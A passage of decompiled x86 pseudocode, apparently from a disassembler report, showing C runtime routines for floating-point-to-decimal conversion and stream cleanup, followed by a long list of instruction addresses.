																			_t1213 = _v1928;
																			_t1105 = _v1880;
																			goto L176;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1106 - 0x73;
																			if(_t1106 == 0x73) {
																				goto L169;
																			}
																			__eflags = _t1106 - _t1165;
																			if(_t1106 == _t1165) {
																				 *(_t1273 + _t1106 * 4 - 0x740) =  *(_t1273 + _t1106 * 4 - 0x740) & 0x00000000;
																				_t950 = _t938 + 1 + _t1257;
																				__eflags = _t950;
																				_v1864 = _t950;
																				_t938 = _v1872;
																			}
																			_t945 =  *(_v1876 + _t938 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1273 + _t1106 * 4 - 0x740) =  *(_t1273 + _t1106 * 4 - 0x740) + _t945 * _v1884 + _t1214;
																			asm("adc edx, 0x0");
																			_t938 = _v1872 + 1;
																			_t1106 = _t1106 + 1;
																			_v1872 = _t938;
																			_t1214 = _t945 * _v1884 >> 0x20;
																			_t1165 = _v1864;
																			__eflags = _t938 - _v1892;
																			if(_t938 != _v1892) {
																				continue;
																			} else {
																				goto L169;
																			}
																			while(1) {
																				L169:
																				__eflags = _t1214;
																				if(_t1214 == 0) {
																					goto L174;
																				}
																				__eflags = _t1106 - 0x73;
																				if(_t1106 == 0x73) {
																					L187:
																					__eflags = 0;
																					_v2408 = 0;
																					_v936 = 0;
																					_push(0);
																					_t940 =  &_v2404;
																					goto L188;
																				} else {
																					__eflags = _t1106 - _t1165;
																					if(_t1106 == _t1165) {
																						_t370 = _t1273 + _t1106 * 4 - 0x740;
																						 *_t370 =  *(_t1273 + _t1106 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t370;
																						_t376 = _t1106 + 1; // 0x1
																						_v1864 = _t376;
																					}
																					_t943 = _t1214;
																					_t1214 = 0;
																					 *(_t1273 + _t1106 * 4 - 0x740) =  *(_t1273 + _t1106 * 4 - 0x740) + _t943;
																					_t1165 = _v1864;
																					asm("adc edi, edi");
																					_t1106 = _t1106 + 1;
																					continue;
																				}
																				goto L181;
																			}
																			goto L174;
																		}
																		goto L169;
																	}
																} else {
																	__eflags = _t1257 - _t1165;
																	if(_t1257 == _t1165) {
																		 *(_t1273 + _t1257 * 4 - 0x740) =  *(_t1273 + _t1257 * 4 - 0x740) & _t937;
																		_t338 = _t1257 + 1; // 0x1
																		_t1165 = _t338;
																		_v1864 = _t1165;
																	}
																	goto L176;
																}
																goto L181;
																L176:
																_t1257 = _t1257 + 1;
																__eflags = _t1257 - _t1105;
															} while (_t1257 != _t1105);
															goto L177;
														}
													} else {
														_t1215 = _v932;
														_v936 = _t1105;
														E00A0AA64( &_v932, _t1064,  &_v1396, _t1105 << 2);
														_t1279 =  &(_t1279[4]);
														__eflags = _t1215;
														if(_t1215 != 0) {
															__eflags = _t1215 - 1;
															if(_t1215 == 1) {
																goto L180;
															} else {
																__eflags = _v936;
																if(_v936 == 0) {
																	goto L180;
																} else {
																	_t1107 = 0;
																	_v1884 = _v936;
																	_t1258 = 0;
																	__eflags = 0;
																	do {
																		_t958 = _t1215;
																		_t1166 = _t958 *  *(_t1273 + _t1258 * 4 - 0x3a0) >> 0x20;
																		 *(_t1273 + _t1258 * 4 - 0x3a0) = _t958 *  *(_t1273 + _t1258 * 4 - 0x3a0) + _t1107;
																		asm("adc edx, 0x0");
																		_t1258 = _t1258 + 1;
																		_t1107 = _t1166;
																		__eflags = _t1258 - _v1884;
																	} while (_t1258 != _v1884);
																	goto L149;
																}
															}
														} else {
															_v1400 = 0;
															_v936 = 0;
															_push(0);
															_t930 =  &_v1396;
															goto L179;
														}
													}
												} else {
													_t1216 = _v1396;
													__eflags = _t1216;
													if(_t1216 != 0) {
														__eflags = _t1216 - 1;
														if(_t1216 == 1) {
															goto L180;
														} else {
															__eflags = _v936;
															if(_v936 == 0) {
																goto L180;
															} else {
																_t1108 = 0;
																_v1884 = _v936;
																_t1259 = 0;
																__eflags = 0;
																do {
																	_t965 = _t1216;
																	_t1167 = _t965 *  *(_t1273 + _t1259 * 4 - 0x3a0) >> 0x20;
																	 *(_t1273 + _t1259 * 4 - 0x3a0) = _t965 *  *(_t1273 + _t1259 * 4 - 0x3a0) + _t1108;
																	asm("adc edx, 0x0");
																	_t1259 = _t1259 + 1;
																	_t1108 = _t1167;
																	__eflags = _t1259 - _v1884;
																} while (_t1259 != _v1884);
																L149:
																__eflags = _t1107;
																if(_t1107 == 0) {
																	goto L180;
																} else {
																	_t961 = _v936;
																	__eflags = _t961 - 0x73;
																	if(_t961 < 0x73) {
																		 *(_t1273 + _t961 * 4 - 0x3a0) = _t1107;
																		_v936 = _v936 + 1;
																		goto L180;
																	} else {
																		_v1400 = 0;
																		_v936 = 0;
																		_push(0);
																		_t940 =  &_v1396;
																		L188:
																		_push(_t940);
																		_push(_t1064);
																		_push( &_v932);
																		E00A0AA64();
																		_t1279 =  &(_t1279[4]);
																		_t933 = 0;
																	}
																}
															}
														}
													} else {
														_t929 = 0;
														_v1864 = 0;
														_v936 = 0;
														L178:
														_push(_t929);
														_t930 =  &_v1860;
														L179:
														_push(_t930);
														_push(_t1064);
														_push( &_v932);
														E00A0AA64();
														_t1279 =  &(_t1279[4]);
														L180:
														_t933 = 1;
													}
												}
												L181:
												__eflags = _t933;
												if(_t933 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_t404 =  &_v936;
													 *_t404 = _v936 & 0x00000000;
													__eflags =  *_t404;
													_push(0);
													L190:
													_push( &_v2404);
													_t852 =  &_v932;
													L262:
													_push(_t1064);
													_push(_t852);
													E00A0AA64();
													_t1279 =  &(_t1279[4]);
												} else {
													goto L182;
												}
												goto L263;
												L182:
												_t908 = _v1908 - _v1888;
												__eflags = _t908;
												_v1908 = _t908;
											} while (_t908 != 0);
											_t1102 = _v1896;
											goto L184;
										}
									}
									L263:
									_t1196 = _v1920;
									_t1245 = _t1196;
									_t1086 = _v472;
									_v1872 = _t1245;
									__eflags = _t1086;
									if(_t1086 != 0) {
										_t1249 = 0;
										_t1200 = 0;
										__eflags = 0;
										do {
											_t841 =  *(_t1273 + _t1200 * 4 - 0x1d0);
											_t1153 = 0xa;
											_t1154 = _t841 * _t1153 >> 0x20;
											 *(_t1273 + _t1200 * 4 - 0x1d0) = _t841 * _t1153 + _t1249;
											asm("adc edx, 0x0");
											_t1200 = _t1200 + 1;
											_t1249 = _t1154;
											__eflags = _t1200 - _t1086;
										} while (_t1200 != _t1086);
										_v1896 = _t1249;
										__eflags = _t1249;
										_t1245 = _v1872;
										if(_t1249 != 0) {
											_t1095 = _v472;
											__eflags = _t1095 - 0x73;
											if(_t1095 >= 0x73) {
												__eflags = 0;
												_v2408 = 0;
												_v472 = 0;
												E00A0AA64( &_v468, _t1064,  &_v2404, 0);
												_t1279 =  &(_t1279[4]);
											} else {
												 *(_t1273 + _t1095 * 4 - 0x1d0) = _t1154;
												_v472 = _v472 + 1;
											}
										}
										_t1196 = _t1245;
									}
									_t815 = E00A0C0B0( &_v472,  &_v936);
									_t1146 = 0xa;
									__eflags = _t815 - _t1146;
									if(_t815 != _t1146) {
										__eflags = _t815;
										if(_t815 != 0) {
											_t816 = _t815 + 0x30;
											__eflags = _t816;
											_t1245 = _t1196 + 1;
											 *_t1196 = _t816;
											_v1872 = _t1245;
											goto L282;
										} else {
											_t817 = _v1904 - 1;
										}
									} else {
										_v1904 = _v1904 + 1;
										_t1245 = _t1196 + 1;
										_t832 = _v936;
										 *_t1196 = 0x31;
										_v1872 = _t1245;
										__eflags = _t832;
										if(_t832 != 0) {
											_t1199 = 0;
											_t1248 = _t832;
											_t1094 = 0;
											__eflags = 0;
											do {
												_t833 =  *(_t1273 + _t1094 * 4 - 0x3a0);
												 *(_t1273 + _t1094 * 4 - 0x3a0) = _t833 * _t1146 + _t1199;
												asm("adc edx, 0x0");
												_t1094 = _t1094 + 1;
												_t1199 = _t833 * _t1146 >> 0x20;
												_t1146 = 0xa;
												__eflags = _t1094 - _t1248;
											} while (_t1094 != _t1248);
											_t1245 = _v1872;
											__eflags = _t1199;
											if(_t1199 != 0) {
												_t836 = _v936;
												__eflags = _t836 - 0x73;
												if(_t836 >= 0x73) {
													_v2408 = 0;
													_v936 = 0;
													E00A0AA64( &_v932, _t1064,  &_v2404, 0);
													_t1279 =  &(_t1279[4]);
												} else {
													 *(_t1273 + _t836 * 4 - 0x3a0) = _t1199;
													_v936 = _v936 + 1;
												}
											}
										}
										L282:
										_t817 = _v1904;
									}
									 *((intOrPtr*)(_v1924 + 4)) = _t817;
									_t1070 = _v1916;
									__eflags = _t817;
									if(_t817 >= 0) {
										__eflags = _t1070 - 0x7fffffff;
										if(_t1070 <= 0x7fffffff) {
											_t1070 = _t1070 + _t817;
											__eflags = _t1070;
										}
									}
									_t819 = _a24 - 1;
									__eflags = _t819 - _t1070;
									if(_t819 >= _t1070) {
										_t819 = _t1070;
									}
									_t755 = _t819 + _v1920;
									_v1916 = _t755;
									__eflags = _t1245 - _t755;
									if(__eflags != 0) {
										while(1) {
											_t755 = _v472;
											__eflags = _t755;
											if(__eflags == 0) {
												goto L303;
											}
											_t1197 = 0;
											_t1246 = _t755;
											_t1090 = 0;
											__eflags = 0;
											do {
												_t820 =  *(_t1273 + _t1090 * 4 - 0x1d0);
												 *(_t1273 + _t1090 * 4 - 0x1d0) = _t820 * 0x3b9aca00 + _t1197;
												asm("adc edx, 0x0");
												_t1090 = _t1090 + 1;
												_t1197 = _t820 * 0x3b9aca00 >> 0x20;
												__eflags = _t1090 - _t1246;
											} while (_t1090 != _t1246);
											_t1247 = _v1872;
											__eflags = _t1197;
											if(_t1197 != 0) {
												_t826 = _v472;
												__eflags = _t826 - 0x73;
												if(_t826 >= 0x73) {
													__eflags = 0;
													_v2408 = 0;
													_v472 = 0;
													E00A0AA64( &_v468, _t1064,  &_v2404, 0);
													_t1279 =  &(_t1279[4]);
												} else {
													 *(_t1273 + _t826 * 4 - 0x1d0) = _t1197;
													_v472 = _v472 + 1;
												}
											}
											_t825 = E00A0C0B0( &_v472,  &_v936);
											_t1198 = 8;
											_t1070 = _v1916 - _t1247;
											__eflags = _t1070;
											do {
												_t708 = _t825 % _v1912;
												_t825 = _t825 / _v1912;
												_t1151 = _t708 + 0x30;
												__eflags = _t1070 - _t1198;
												if(_t1070 >= _t1198) {
													 *((char*)(_t1198 + _t1247)) = _t1151;
												}
												_t1198 = _t1198 - 1;
												__eflags = _t1198 - 0xffffffff;
											} while (_t1198 != 0xffffffff);
											__eflags = _t1070 - 9;
											if(_t1070 > 9) {
												_t1070 = 9;
											}
											_t1245 = _t1247 + _t1070;
											_v1872 = _t1245;
											__eflags = _t1245 - _v1916;
											if(__eflags != 0) {
												continue;
											}
											goto L303;
										}
									}
									L303:
									 *_t1245 = 0;
									goto L309;
								}
							}
						}
					}
				} else {
					_t1070 = _t1236 & 0x000fffff;
					if((_t1188 | _t1236 & 0x000fffff) != 0) {
						goto L5;
					} else {
						_push(0xa16ac4);
						 *((intOrPtr*)(_v1924 + 4)) =  *(_v1924 + 4) & 0x00000000;
						L308:
						_push(_a24);
						_push(_t1055);
						if(E00A079F6() != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00A07DBB();
							asm("int3");
							E009FE2F0(_t1142, 0xa1a9e8, 0x10);
							_v32 = _v32 & 0x00000000;
							E00A09931(8);
							_pop(_t1071);
							_t721 =  &_v8;
							 *_t721 = _v8 & 0x00000000;
							__eflags =  *_t721;
							_t1237 = 3;
							while(1) {
								_v36 = _t1237;
								__eflags = _t1237 -  *0xa40404; // 0x200
								if(__eflags == 0) {
									break;
								}
								_t763 =  *0xa40408; // 0x0
								_t764 =  *(_t763 + _t1237 * 4);
								__eflags = _t764;
								if(_t764 != 0) {
									__eflags =  *(_t764 + 0xc) >> 0x0000000d & 0x00000001;
									if(__eflags != 0) {
										_t773 =  *0xa40408; // 0x0
										_push( *((intOrPtr*)(_t773 + _t1237 * 4)));
										_t774 = E00A0EC83(_t1071, _t1142, __eflags);
										__eflags = _t774 - 0xffffffff;
										if(_t774 != 0xffffffff) {
											_t731 =  &_v32;
											 *_t731 = _v32 + 1;
											__eflags =  *_t731;
										}
									}
									_t767 =  *0xa40408; // 0x0
									DeleteCriticalSection( *((intOrPtr*)(_t767 + _t1237 * 4)) + 0x20);
									_t770 =  *0xa40408; // 0x0
									E00A07A50( *((intOrPtr*)(_t770 + _t1237 * 4)));
									_pop(_t1071);
									_t772 =  *0xa40408; // 0x0
									_t737 = _t772 + _t1237 * 4;
									 *_t737 =  *(_t772 + _t1237 * 4) & 0x00000000;
									__eflags =  *_t737;
								}
								_t1237 = _t1237 + 1;
							}
							_v8 = 0xfffffffe;
							E00A0D991();
							return E009FE336(_t1142);
						} else {
							L309:
							_t1286 = _v1936;
							if(_v1936 != 0) {
								_t755 = E00A0DFE5(_t1070, _t1286,  &_v1944);
							}
							return E009FE203(_t755, _v8 ^ _t1273);
						}
					}
				}
			}































































































































































































































































                            0x00a0c55e
                            0x00a0c561
                            0x00a0c563
                            0x00a0c569
                            0x00a0c570
                            0x00a0c574
                            0x00a0c57d
                            0x00a0c57e
                            0x00a0c57f
                            0x00a0c582
                            0x00a0c588
                            0x00a0c58e
                            0x00a0c593
                            0x00a0c5a2
                            0x00a0c5a4
                            0x00a0c5a6
                            0x00a0c5a6
                            0x00a0c5ad
                            0x00a0c5b7
                            0x00a0c5bc
                            0x00a0c5bf
                            0x00a0c5e3
                            0x00a0c5e7
                            0x00a0c5ec
                            0x00a0c5ed
                            0x00a0c5ef
                            0x00a0c5f1
                            0x00a0c5f7
                            0x00a0c5f7
                            0x00a0c5fe
                            0x00a0c5fe
                            0x00a0c601
                            0x00a0d8b1
                            0x00000000
                            0x00a0c607
                            0x00a0c607
                            0x00a0c607
                            0x00a0c60a
                            0x00a0d8aa
                            0x00000000
                            0x00a0c610
                            0x00a0c610
                            0x00a0c610
                            0x00a0c613
                            0x00a0d8a3
                            0x00000000
                            0x00a0c619
                            0x00a0c619
                            0x00a0c61c
                            0x00a0d89c
                            0x00000000
                            0x00a0c622
                            0x00a0c62b
                            0x00a0c633
                            0x00a0c636
                            0x00a0c639
                            0x00a0c63c
                            0x00a0c642
                            0x00a0c64a
                            0x00a0c650
                            0x00a0c65a
                            0x00a0c65a
                            0x00a0c65d
                            0x00a0c665
                            0x00a0c66c
                            0x00a0c66c
                            0x00a0c65f
                            0x00a0c65f
                            0x00a0c661
                            0x00a0c674
                            0x00a0c67a
                            0x00a0c67c
                            0x00a0c680
                            0x00a0c685
                            0x00a0c692
                            0x00a0c694
                            0x00a0c69a
                            0x00a0c69f
                            0x00a0c6a0
                            0x00a0c6a1
                            0x00a0c6ab
                            0x00a0c6b0
                            0x00a0c6b6
                            0x00a0c6bb
                            0x00a0c6c4
                            0x00a0c6c4
                            0x00a0c6c6
                            0x00a0c6bd
                            0x00a0c6bd
                            0x00a0c6c2
                            0x00000000
                            0x00000000
                            0x00a0c6c2
                            0x00a0c6cc
                            0x00a0c6d4
                            0x00a0c6d6
                            0x00a0c6df
                            0x00a0c6e0
                            0x00a0c6e6
                            0x00a0c6e8
                            0x00a0cadb
                            0x00a0cae1
                            0x00a0cc00
                            0x00a0cc00
                            0x00a0cc07
                            0x00a0cc07
                            0x00a0cc07
                            0x00a0cc0e
                            0x00a0cc11
                            0x00a0cc18
                            0x00a0cc18
                            0x00a0cc13
                            0x00a0cc13
                            0x00a0cc13
                            0x00a0cc1c
                            0x00a0cc1d
                            0x00a0cc1f
                            0x00a0cc22
                            0x00a0cc25
                            0x00a0cc28
                            0x00a0cc2e
                            0x00a0cc31
                            0x00a0cc34
                            0x00a0cc3e
                            0x00a0cc3e
                            0x00a0cc3e
                            0x00a0cc36
                            0x00a0cc36
                            0x00a0cc38
                            0x00000000
                            0x00a0cc3a
                            0x00a0cc3a
                            0x00a0cc3a
                            0x00a0cc38
                            0x00a0cc40
                            0x00a0cc42
                            0x00a0cce3
                            0x00a0cce3
                            0x00a0ccf0
                            0x00a0ccf0
                            0x00a0ccf0
                            0x00a0cd06
                            0x00a0cd0b
                            0x00a0cc48
                            0x00a0cc48
                            0x00a0cc4a
                            0x00000000
                            0x00a0cc50
                            0x00a0cc52
                            0x00a0cc53
                            0x00a0cc55
                            0x00a0cc57
                            0x00a0cc57
                            0x00a0cc59
                            0x00a0cc5c
                            0x00a0cc64
                            0x00a0cc66
                            0x00a0cc69
                            0x00a0cc6f
                            0x00a0cc6f
                            0x00a0cc71
                            0x00a0cc7d
                            0x00a0cc7d
                            0x00a0cc7d
                            0x00a0cc73
                            0x00a0cc75
                            0x00a0cc75
                            0x00a0cc84
                            0x00a0cc87
                            0x00a0cc89
                            0x00a0cc90
                            0x00a0cc90
                            0x00a0cc8b
                            0x00a0cc8b
                            0x00a0cc8b
                            0x00a0cc98
                            0x00a0cca2
                            0x00a0cca8
                            0x00a0cca9
                            0x00a0ccae
                            0x00a0ccb4
                            0x00a0ccb7
                            0x00000000
                            0x00000000
                            0x00a0ccb9
                            0x00a0ccb9
                            0x00a0ccc1
                            0x00a0ccc1
                            0x00a0ccc7
                            0x00a0ccce
                            0x00a0ccdb
                            0x00a0ccd0
                            0x00a0ccd0
                            0x00a0ccd3
                            0x00a0ccd3
                            0x00a0ccce
                            0x00a0cc4a
                            0x00a0cd17
                            0x00a0cd27
                            0x00a0cd34
                            0x00a0cd36
                            0x00a0cd3d
                            0x00a0cae7
                            0x00a0cae7
                            0x00a0caf0
                            0x00a0caf1
                            0x00a0cafb
                            0x00a0cb01
                            0x00a0cb03
                            0x00a0cb09
                            0x00a0cb09
                            0x00a0cb0b
                            0x00a0cb0b
                            0x00a0cb12
                            0x00a0cb19
                            0x00000000
                            0x00000000
                            0x00a0cb1f
                            0x00a0cb22
                            0x00a0cb25
                            0x00000000
                            0x00a0cb27
                            0x00a0cb27
                            0x00a0cb27
                            0x00a0cb27
                            0x00a0cb2e
                            0x00a0cb31
                            0x00a0cb38
                            0x00a0cb38
                            0x00a0cb33
                            0x00a0cb33
                            0x00a0cb33
                            0x00a0cb3c
                            0x00a0cb3f
                            0x00a0cb41
                            0x00a0cb43
                            0x00a0cb49
                            0x00a0cb4f
                            0x00a0cb51
                            0x00a0cb51
                            0x00a0cb51
                            0x00a0cb58
                            0x00a0cb58
                            0x00a0cb5a
                            0x00a0cb66
                            0x00a0cb66
                            0x00a0cb66
                            0x00a0cb5c
                            0x00a0cb5e
                            0x00a0cb5e
                            0x00a0cb6d
                            0x00a0cb70
                            0x00a0cb72
                            0x00a0cb79
                            0x00a0cb79
                            0x00a0cb74
                            0x00a0cb74
                            0x00a0cb74
                            0x00a0cb81
                            0x00a0cb8c
                            0x00a0cb92
                            0x00a0cb93
                            0x00a0cb98
                            0x00a0cb9e
                            0x00a0cba1
                            0x00000000
                            0x00000000
                            0x00a0cba3
                            0x00a0cba3
                            0x00a0cbad
                            0x00a0cbb8
                            0x00a0cbc0
                            0x00a0cbc6
                            0x00a0cbd1
                            0x00a0cbd7
                            0x00a0cbde
                            0x00a0cbf1
                            0x00a0cbf8
                            0x00a0cbf8
                            0x00000000
                            0x00a0cb25
                            0x00a0cb0b
                            0x00000000
                            0x00a0cb03
                            0x00a0cd40
                            0x00a0cd40
                            0x00a0cd46
                            0x00a0cd4b
                            0x00a0cd51
                            0x00a0cd64
                            0x00a0cd69
                            0x00a0c6ee
                            0x00a0c6ee
                            0x00a0c6f7
                            0x00a0c6f8
                            0x00a0c702
                            0x00a0c708
                            0x00a0c70a
                            0x00a0c910
                            0x00a0c918
                            0x00a0c91b
                            0x00a0c920
                            0x00a0c923
                            0x00a0c92b
                            0x00a0c92f
                            0x00a0c935
                            0x00a0c93b
                            0x00a0c940
                            0x00a0c947
                            0x00a0c948
                            0x00a0c948
                            0x00a0c948
                            0x00a0c94f
                            0x00a0c952
                            0x00a0c95a
                            0x00a0c960
                            0x00a0c965
                            0x00a0c965
                            0x00a0c962
                            0x00a0c962
                            0x00a0c962
                            0x00a0c969
                            0x00a0c96a
                            0x00a0c96c
                            0x00a0c96f
                            0x00a0c975
                            0x00a0c97b
                            0x00a0c97e
                            0x00a0c981
                            0x00a0c987
                            0x00a0c98a
                            0x00a0c98d
                            0x00a0c997
                            0x00a0c997
                            0x00a0c997
                            0x00a0c98f
                            0x00a0c98f
                            0x00a0c991
                            0x00000000
                            0x00a0c993
                            0x00a0c993
                            0x00a0c993
                            0x00a0c991
                            0x00a0c999
                            0x00a0c99b
                            0x00a0ca8d
                            0x00a0ca8d
                            0x00a0ca8f
                            0x00a0ca95
                            0x00a0ca9b
                            0x00a0cab0
                            0x00a0cab5
                            0x00a0c9a1
                            0x00a0c9a1
                            0x00a0c9a3
                            0x00000000
                            0x00a0c9a9
                            0x00a0c9ab
                            0x00a0c9ac
                            0x00a0c9ae
                            0x00a0c9b0
                            0x00a0c9b2
                            0x00a0c9b2
                            0x00a0c9b8
                            0x00a0c9ba
                            0x00a0c9c0
                            0x00a0c9c3
                            0x00a0c9d1
                            0x00a0c9d7
                            0x00a0c9d7
                            0x00a0c9d9
                            0x00a0c9dc
                            0x00a0c9e2
                            0x00a0c9e2
                            0x00a0c9e4
                            0x00000000
                            0x00000000
                            0x00a0c9e6
                            0x00a0c9e8
                            0x00a0c9ee
                            0x00a0c9ee
                            0x00a0c9ea
                            0x00a0c9ea
                            0x00a0c9ea
                            0x00a0c9f3
                            0x00a0c9f5
                            0x00a0c9fc
                            0x00a0c9fc
                            0x00a0c9f7
                            0x00a0c9f7
                            0x00a0c9f7
                            0x00a0ca22
                            0x00a0ca28
                            0x00a0ca2b
                            0x00a0ca31
                            0x00a0ca38
                            0x00a0ca39
                            0x00a0ca3a
                            0x00a0ca40
                            0x00a0ca43
                            0x00a0ca45
                            0x00000000
                            0x00a0ca45
                            0x00000000
                            0x00a0ca43
                            0x00a0ca4d
                            0x00a0ca53
                            0x00a0ca5b
                            0x00a0ca5b
                            0x00a0ca5c
                            0x00a0ca5e
                            0x00a0ca62
                            0x00a0ca6a
                            0x00a0ca6a
                            0x00a0ca6a
                            0x00a0ca6c
                            0x00a0ca73
                            0x00a0ca78
                            0x00a0ca85
                            0x00a0ca7a
                            0x00a0ca7d
                            0x00a0ca7d
                            0x00a0ca78
                            0x00a0c9a3
                            0x00a0cab8
                            0x00a0cac2
                            0x00a0cac8
                            0x00a0cace
                            0x00a0cad4
                            0x00a0c710
                            0x00a0c710
                            0x00a0c710
                            0x00a0c712
                            0x00a0c719
                            0x00a0c720
                            0x00000000
                            0x00000000
                            0x00a0c726
                            0x00a0c729
                            0x00a0c72c
                            0x00000000
                            0x00a0c72e
                            0x00a0c736
                            0x00a0c73b
                            0x00a0c740
                            0x00a0c741
                            0x00a0c743
                            0x00a0c74b
                            0x00a0c74f
                            0x00a0c755
                            0x00a0c75b
                            0x00a0c760
                            0x00a0c767
                            0x00a0c767
                            0x00a0c768
                            0x00a0c76b
                            0x00a0c773
                            0x00a0c779
                            0x00a0c77e
                            0x00a0c77e
                            0x00a0c77b
                            0x00a0c77b
                            0x00a0c77b
                            0x00a0c782
                            0x00a0c783
                            0x00a0c785
                            0x00a0c788
                            0x00a0c78e
                            0x00a0c794
                            0x00a0c797
                            0x00a0c79a
                            0x00a0c7a0
                            0x00a0c7a3
                            0x00a0c7a6
                            0x00a0c7b0
                            0x00a0c7b0
                            0x00a0c7b0
                            0x00a0c7a8
                            0x00a0c7a8
                            0x00a0c7aa
                            0x00000000
                            0x00a0c7ac
                            0x00a0c7ac
                            0x00a0c7ac
                            0x00a0c7aa
                            0x00a0c7b2
                            0x00a0c7b4
                            0x00a0c8a9
                            0x00a0c8a9
                            0x00a0c8ab
                            0x00a0c8b1
                            0x00a0c8b7
                            0x00a0c8cc
                            0x00a0c8d1
                            0x00a0c7ba
                            0x00a0c7ba
                            0x00a0c7bc
                            0x00000000
                            0x00a0c7c2
                            0x00a0c7c4
                            0x00a0c7c5
                            0x00a0c7c7
                            0x00a0c7c9
                            0x00a0c7cb
                            0x00a0c7cb
                            0x00a0c7d1
                            0x00a0c7d3
                            0x00a0c7d9
                            0x00a0c7dc
                            0x00a0c7ea
                            0x00a0c7f0
                            0x00a0c7f0
                            0x00a0c7f2
                            0x00a0c7f5
                            0x00a0c7fb
                            0x00a0c7fb
                            0x00a0c7fd
                            0x00000000
                            0x00000000
                            0x00a0c7ff
                            0x00a0c801
                            0x00a0c807
                            0x00a0c807
                            0x00a0c803
                            0x00a0c803
                            0x00a0c803
                            0x00a0c80c
                            0x00a0c80e
                            0x00a0c81b
                            0x00a0c81b
                            0x00a0c810
                            0x00a0c816
                            0x00a0c816
                            0x00a0c839
                            0x00a0c841
                            0x00a0c848
                            0x00a0c84f
                            0x00a0c850
                            0x00a0c853
                            0x00a0c859
                            0x00a0c85f
                            0x00a0c862
                            0x00a0c864
                            0x00000000
                            0x00a0c864
                            0x00000000
                            0x00a0c862
                            0x00a0c86c
                            0x00a0c872
                            0x00a0c872
                            0x00a0c878
                            0x00a0c87a
                            0x00a0c884
                            0x00a0c886
                            0x00a0c886
                            0x00a0c886
                            0x00a0c888
                            0x00a0c88f
                            0x00a0c894
                            0x00a0c8a1
                            0x00a0c896
                            0x00a0c899
                            0x00a0c899
                            0x00a0c894
                            0x00a0c7bc
                            0x00a0c8d4
                            0x00a0c8df
                            0x00a0c8e0
                            0x00a0c8e1
                            0x00a0c8e7
                            0x00a0c8ed
                            0x00a0c8f3
                            0x00a0c8f3
                            0x00000000
                            0x00a0c72c
                            0x00000000
                            0x00a0c712
                            0x00a0c8f4
                            0x00a0c8fa
                            0x00a0c901
                            0x00a0c902
                            0x00a0c903
                            0x00a0c908
                            0x00a0c908
                            0x00a0cd6c
                            0x00a0cd76
                            0x00a0cd77
                            0x00a0cd7d
                            0x00a0cd7f
                            0x00a0d1e8
                            0x00a0d1ea
                            0x00a0d1ec
                            0x00a0d1f2
                            0x00a0d1f4
                            0x00a0d1fa
                            0x00a0d1fc
                            0x00a0d54e
                            0x00a0d54e
                            0x00a0d550
                            0x00a0d556
                            0x00a0d55d
                            0x00a0d563
                            0x00a0d565
                            0x00a0d603
                            0x00a0d603
                            0x00a0d605
                            0x00a0d606
                            0x00a0d60c
                            0x00000000
                            0x00a0d56b
                            0x00a0d56b
                            0x00a0d56e
                            0x00a0d574
                            0x00a0d57a
                            0x00a0d57c
                            0x00a0d582
                            0x00a0d584
                            0x00a0d584
                            0x00a0d586
                            0x00a0d586
                            0x00a0d58f
                            0x00a0d596
                            0x00a0d59c
                            0x00a0d59f
                            0x00a0d5a0
                            0x00a0d5a2
                            0x00a0d5a2
                            0x00a0d5a6
                            0x00a0d5a8
                            0x00a0d5aa
                            0x00a0d5b0
                            0x00a0d5b3
                            0x00000000
                            0x00a0d5b5
                            0x00a0d5b5
                            0x00a0d5bc
                            0x00a0d5bc
                            0x00a0d5b3
                            0x00a0d5a8
                            0x00a0d57c
                            0x00a0d56e
                            0x00a0d565
                            0x00a0d202
                            0x00a0d202
                            0x00a0d202
                            0x00a0d205
                            0x00a0d209
                            0x00a0d209
                            0x00a0d20a
                            0x00a0d21c
                            0x00a0d229
                            0x00a0d238
                            0x00a0d262
                            0x00a0d267
                            0x00a0d26d
                            0x00a0d270
                            0x00a0d276
                            0x00a0d279
                            0x00a0d312
                            0x00a0d319
                            0x00a0d397
                            0x00a0d39d
                            0x00a0d3a3
                            0x00a0d3a6
                            0x00a0d3a8
                            0x00a0d431
                            0x00a0d3ae
                            0x00a0d3ae
                            0x00a0d3b4
                            0x00a0d3b4
                            0x00a0d3ba
                            0x00a0d3c0
                            0x00a0d3c2
                            0x00a0d3c4
                            0x00a0d3c4
                            0x00a0d3ca
                            0x00a0d3d0
                            0x00a0d3d2
                            0x00a0d3da
                            0x00a0d3da
                            0x00a0d3e0
                            0x00a0d3e2
                            0x00a0d3e4
                            0x00a0d3ea
                            0x00a0d3ec
                            0x00a0d503
                            0x00a0d505
                            0x00a0d50b
                            0x00a0d50b
                            0x00a0d50e
                            0x00a0d50f
                            0x00000000
                            0x00a0d3f2
                            0x00a0d3f8
                            0x00a0d3f8
                            0x00a0d3fa
                            0x00a0d400
                            0x00a0d403
                            0x00a0d40a
                            0x00a0d410
                            0x00a0d412
                            0x00a0d439
                            0x00a0d43b
                            0x00a0d43d
                            0x00a0d43f
                            0x00a0d445
                            0x00a0d44b
                            0x00a0d4e5
                            0x00a0d4e5
                            0x00a0d4e8
                            0x00000000
                            0x00a0d4ee
                            0x00a0d4ee
                            0x00a0d4f4
                            0x00000000
                            0x00a0d4f4
                            0x00a0d451
                            0x00a0d451
                            0x00a0d451
                            0x00a0d454
                            0x00000000
                            0x00000000
                            0x00a0d456
                            0x00a0d458
                            0x00a0d45a
                            0x00a0d463
                            0x00a0d463
                            0x00a0d465
                            0x00a0d46b
                            0x00a0d46b
                            0x00a0d477
                            0x00a0d482
                            0x00a0d485
                            0x00a0d492
                            0x00a0d495
                            0x00a0d496
                            0x00a0d497
                            0x00a0d49d
                            0x00a0d49f
                            0x00a0d4a5
                            0x00a0d4ab
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a0d4ad
                            0x00a0d4ad
                            0x00a0d4ad
                            0x00a0d4af
                            0x00000000
                            0x00000000
                            0x00a0d4b1
                            0x00a0d4b4
                            0x00000000
                            0x00a0d4ba
                            0x00a0d4ba
                            0x00a0d4bc
                            0x00a0d4be
                            0x00a0d4be
                            0x00a0d4be
                            0x00a0d4c6
                            0x00a0d4c9
                            0x00a0d4c9
                            0x00a0d4cf
                            0x00a0d4d1
                            0x00a0d4d3
                            0x00a0d4da
                            0x00a0d4e0
                            0x00a0d4e2
                            0x00000000
                            0x00a0d4e2
                            0x00000000
                            0x00a0d4b4
                            0x00000000
